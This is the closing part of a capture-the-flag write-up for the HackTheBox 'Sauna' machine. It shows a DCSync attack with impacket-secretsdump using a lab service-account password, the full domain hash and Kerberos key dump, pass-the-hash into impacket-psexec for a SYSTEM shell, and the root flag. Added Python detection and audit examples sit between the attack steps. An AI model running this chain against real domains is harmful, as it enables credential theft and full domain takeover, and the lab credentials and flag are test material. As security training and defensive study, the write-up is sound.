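Added example, not part of the writeup; the sample output is constructed
in reg.exe's layout with an invented password."""

import re

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Value names that carry a stored logon credential, and the switch that enables its use
SECRET_VALUES = {"defaultpassword", "altdefaultpassword"}
SWITCH_VALUES = {"autoadminlogon"}

# Constructed sample in the layout reg.exe prints: key path flush-left,
# values indented as "Name    Type    Data".
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    EXAMPLE\svc_example
    DefaultPassword    REG_SZ    Example-Constructed-Pass1

HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\App
    PasswordHint    REG_SZ    see helpdesk

End of search: 2 match(es) found.
"""

VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text):
    """Yield (key, name, type, data) for every value line, tracking the
    key path printed above it."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group(1), m.group(2), m.group(3).strip()


def autologon_findings(text):
    """Return (value name, detail) pairs for Winlogon credential values.
    Secret data is reported by length only, so the finding can be logged."""
    findings = []
    for key, name, _type, data in parse_reg_query(text):
        if key.lower() != WINLOGON_KEY.lower():
            continue
        lname = name.lower()
        if lname in SECRET_VALUES and data:
            findings.append((name, f"<set, {len(data)} chars>"))
        elif lname in SWITCH_VALUES and data == "1":
            findings.append((name, "enabled"))
    return findings


if __name__ == "__main__":
    for name, detail in autologon_findings(SAMPLE_OUTPUT):
        print(f"{name}: {detail}")
```

A DefaultPassword value is readable by every local user, which is exactly how a low-privileged account recovers it here; the supported alternative is to store the auto-logon secret with LSA (the DefaultPassword LSA secret set by tools such as Sysinternals Autologon), or better, not to auto-logon with a domain service account at all.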

20. Now let's exploit this; below is the BloodHound hint

You can use impacket's secretsdump.py example script to perform a DCSync attack and obtain the password hash of any principal:

secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'

You can also perform the more complicated ExtraSids attack to hop domain trusts. For information on that, see the blog post by harmj0y in the references tab.

impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@EGOTISTICAL-BANK.LOCAL'
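What makes the DCSync in this step possible is that svc_loanmgr holds the directory replication rights on the domain object (the edge BloodHound drew in step 18). When "Audit Directory Service Access" is enabled with a SACL on the domain head, the domain controller records each such replication request as event 4662 with the replication control-access GUIDs listed in its Properties field. The Python detection below is an added example, not part of the writeup; the 4662 records are constructed with that event's field names, the allow-list of expected replicators is an assumption, and the rights GUIDs and object class GUIDs are the documented well-known values.

```python
"""Detect a DCSync-style replication request in event 4662 (step 20).
A DCSync asks the DC for directory replication, which requires the
DS-Replication-Get-Changes control-access rights; with object-access
auditing enabled on the domain object, the DC records the rights used
in the Properties field of 4662. Added example, not part of the
writeup; the records are constructed with the 4662 field names."""

import re

# Well-known rightsGuid values of the replication control-access rights
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DS_REPL_GET_CHANGES_FILTERED}

CONTROL_ACCESS = "0x100"                                   # AccessMask bit for extended rights
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of the domainDNS class
USER_CLASS = "bf967aba-0de6-11d0-a285-00aa003049e2"        # schema GUID of the user class

# Principals that legitimately replicate: DC machine accounts and any
# directory-sync service you run (assumption for this example).
EXPECTED_REPLICATORS = {"sauna$"}

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed events; Properties lists the access GUIDs in braces as 4662 does.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "svc_loanmgr",
     "ObjectType": "%{" + DOMAIN_DNS_CLASS + "}", "AccessMask": CONTROL_ACCESS,
     "Properties": "{%s} {%s} {%s}" % (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DOMAIN_DNS_CLASS)},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "SAUNA$",
     "ObjectType": "%{" + DOMAIN_DNS_CLASS + "}", "AccessMask": CONTROL_ACCESS,
     "Properties": "{%s} {%s} {%s}" % (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DOMAIN_DNS_CLASS)},
    # benign: a plain property read (0x10) on a user object
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "fsmith",
     "ObjectType": "%{" + USER_CLASS + "}", "AccessMask": "0x10",
     "Properties": "{%s}" % USER_CLASS},
]


def replication_rights_used(ev):
    """Set of replication rights referenced by a 4662 control-access event."""
    if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
        return set()
    guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
    return guids & REPLICATION_RIGHTS


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Return (domain\\user, rights) for replication requests by unexpected principals."""
    alerts = []
    for ev in events:
        rights = replication_rights_used(ev)
        if rights and ev["SubjectUserName"].lower() not in expected:
            alerts.append((f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}', tuple(sorted(rights))))
    return alerts


if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_EVENTS):
        print(subject, rights)
```

The prevention side is the ACL review BloodHound already does for the attacker: only domain controllers (and a deliberately chosen sync account, if any) should hold DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object.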

21. Exploitation

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@EGOTISTICAL-BANK.LOCAL'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:a3be8e197cd4d7ff129ff402410621e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:cdbd363c7a964052edf726a47f4e27a55d56c691672d79a67e0a969a835ce08c
SAUNA$:aes128-cts-hmac-sha1-96:3f620f1b4ea0c8746c569712aa93dee1
SAUNA$:des-cbc-md5:4908f425546bb320
[*] Cleaning up...
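One thing the dump above makes visible at a glance is the password reuse noticed in step 16: HSmith and FSmith have the same NT hash (58a52d36...). A defender can run exactly that comparison over an authorised NTDS extract without cracking anything, since equal NT hashes mean equal passwords. The Python audit below is an added example, not part of the writeup or of impacket; the dump text is constructed with invented hashes (only the empty-LM and empty-NT constants are the real well-known values) and the domain name is a placeholder.

```python
"""Group secretsdump-style NTDS lines by NT hash to find accounts sharing
a password (the reuse of step 16), plus two related checks: accounts
with an empty password and accounts still storing an LM hash.
Added example, not part of the writeup; the dump text is constructed
with invented hashes (only the two empty LM/NT constants are real)."""

import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# secretsdump NTDS line: [DOMAIN\]user:rid:lmhash:nthash:::
DUMP_LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE)

SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EXAMPLE.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""


def parse_dump(text):
    """Return one dict per NTDS hash line; Kerberos key lines do not match."""
    records = []
    for line in text.splitlines():
        m = DUMP_LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["account"] = rec["user"].split("\\")[-1]   # drop the DOMAIN\ prefix
            records.append(rec)
    return records


def shared_nt_hashes(records):
    """NT hash -> accounts, for hashes used by more than one account."""
    by_hash = defaultdict(list)
    for rec in records:
        by_hash[rec["nt"].lower()].append(rec["account"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def empty_password_accounts(records):
    """Accounts whose NT hash is that of the empty password (check they are disabled)."""
    return [rec["account"] for rec in records if rec["nt"].lower() == EMPTY_NT]


def lm_hashes_present(records):
    """Accounts still storing a real LM hash, which should not exist in a modern domain."""
    return [rec["account"] for rec in records if rec["lm"].lower() != EMPTY_LM]


if __name__ == "__main__":
    recs = parse_dump(SAMPLE_DUMP)
    for nt, users in shared_nt_hashes(recs).items():
        print(f"shared password ({nt[:8]}...): {', '.join(users)}")
    print("empty password:", empty_password_accounts(recs))
    print("LM hash stored:", lm_hashes_present(recs))
```

Guest normally shows the empty-password hash because the account is disabled, so the empty-password list should be cross-checked against account status before it is reported.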

22. Plenty of information there; pass the hash straight away with psexec

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec Administrator@EGOTISTICAL-BANK.LOCAL -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on EGOTISTICAL-BANK.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file qpMishEp.exe
[*] Opening SVCManager on EGOTISTICAL-BANK.LOCAL.....
[*] Creating service oCjR on EGOTISTICAL-BANK.LOCAL.....
[*] Starting service oCjR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

23. Read the final flag

C:\Windows\system32> cd C:/Users/Administrator/Desktop

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC

Directory of C:\Users\Administrator\Desktop

07/14/2021 03:35 PM <DIR> .
07/14/2021 03:35 PM <DIR> ..
05/09/2024 07:45 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,677,739,008 bytes free

C:\Users\Administrator\Desktop> type root.txt
6d781428d5fa9d3d6be398fdbbcac36a

C:\Users\Administrator\Desktop>

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/229


https://sh1yan.top/2024/05/10/Sauna-htb-writeup/
Author: shiyan
Published: May 10, 2024